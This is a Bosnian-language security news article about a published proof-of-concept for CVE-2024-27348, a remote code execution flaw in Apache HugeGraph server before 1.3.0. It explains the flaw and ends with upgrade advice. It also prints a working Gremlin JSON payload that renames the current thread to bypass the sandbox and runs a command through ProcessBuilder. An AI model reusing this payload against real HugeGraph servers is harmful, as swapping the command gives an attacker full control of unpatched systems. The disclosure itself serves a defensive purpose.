Site icon Kiber.ba

PoC eksploatacija objavljena za Apache HugeGraph RCE grešku visoke ozbiljnosti

PoC eksploatacija objavljena za Apache HugeGraph RCE grešku visoke ozbiljnosti-Kiber.ba

PoC eksploatacija objavljena za Apache HugeGraph RCE grešku visoke ozbiljnosti-Kiber.ba

Objavljena je provjera koncepta (PoC) eksploatacija za ranjivost visoke ozbiljnosti Remote Code Execution (RCE) u Apache HugeGraph serveru.

Ova ranjivost, identifikovana kao CVE-2024-27348, utiče na verzije HugeGraph servera prije 1.3.0 i dodijeljena joj je CVSS ocjena 9,8, što ukazuje na njenu kritičnu prirodu.

Šta je Apache HugeGraph?

Apache HugeGraph je grafička baza podataka otvorenog koda dizajnirana za rukovanje velikim grafičkim podacima i složenim upitima sa visokim performansama.

Razvijen od strane Baidua, HugeGraph podržava različite modele podataka i jezike upita, uključujući Gremlin, Cypher i SPARQL.

Napravljen je da odgovori na ograničenja postojećih baza podataka grafova u upravljanju masivnim skupovima podataka i složenim upitima. Od njegovog objavljivanja, njegove performanse i fleksibilnost su stekle značajnu vuču.

CVE-2024-27348: kritična ranjivost

CVE-2024-27348 je ozbiljna RCE ranjivost koja omogućava napadačima da zaobiđu ograničenja sandbox-a i postignu daljinsko izvršavanje koda preko Gremlina, jezika za prelazak grafova koji je sastavni dio projekta Apache TinkerPop.

Ova ranjivost omogućava napadačima da steknu potpunu kontrolu nad serverom, što predstavlja značajnu prijetnju organizacijama koje koriste zahvaćene verzije HugeGraph-a.

The patch za ovu ranjivost uključuje nekoliko kritičnih promjena za poboljšavanje sigurnosti. Ključne izmjene su napravljene u sljedećim fajlovima:

Eksploatacija i analiza

PoC eksploatacija pokazuje kako napadač može zaobići sigurnosne mjere iskorištavanjem nedostajuće refleksije SecurityManager-a.

Eksploatacija uključuje promjenu imena trenutne niti kako bi se zaobišle ​​sigurnosne provjere i korištenje klase ProcessBuilder za izvršavanje naredbi.

Evo pojednostavljene verzije koda za eksploataciju:

{

    "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"mkdir\", \"/tmp/SecureLayer7\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",

    "bindings": {},

    "language": "gremlin-groovy",

    "aliases": {}

}

Ovaj kod mijenja naziv niti u “SL7” i koristi ProcessBuilder za kreiranje direktorija, zaobilazeći sigurnosne provjere.

Pozovite start metodu da izvršite našu naredbu i kreirate imenik

Izdavanje PoC eksploatacije za CVE-2024-27348 naglašava kritičnu prirodu ove ranjivosti u Apache HugeGraph-u.

Organizacijama koje koriste zahvaćene verzije HugeGraph-a se preporučuje da ažuriraju na verziju 1.3.0 ili noviju kako bi umanjile rizik.

Ovaj incident naglašava važnost snažnih sigurnosnih mjera i pravovremenog zakrpa za zaštitu od potencijalnih eksploatacija.

Kako se okruženje cyber sigurnost razvija, informisanje o ranjivostima i njihovim ublažavanjima je ključno za održavanje sigurnosti i integriteta sistema i podataka.

Brz odgovor zajednice na ovu ranjivost pokazuje napor saradnje koji je potreban da bi se efikasno adresirale i ublažile takve ozbiljne pretnje.

Izvor:CyberSecurityNews

Exit mobile version